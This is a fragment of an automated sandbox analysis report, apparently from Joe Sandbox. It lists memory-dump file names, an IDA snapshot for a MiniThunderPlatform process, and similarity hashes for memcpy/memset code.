                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcpy$memset
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 438689982-0
                                                                                                                                              • Opcode ID: ad389e94f389bc11e1eead9db158ae93dee0a5bee1e80f97abb419e7c0d7f6b6
                                                                                                                                              • Instruction ID: aa3c26aa17aa9cea25b62d8ccf1e7c3ce156840aa3cf38a2e83af0f7cbcb0d41
                                                                                                                                              • Opcode Fuzzy Hash: ad389e94f389bc11e1eead9db158ae93dee0a5bee1e80f97abb419e7c0d7f6b6
                                                                                                                                              • Instruction Fuzzy Hash: 8C415EB6E00208EBDF01CFA8D881ADEB7B9EF48351F154126F905BB241D771E994CBA1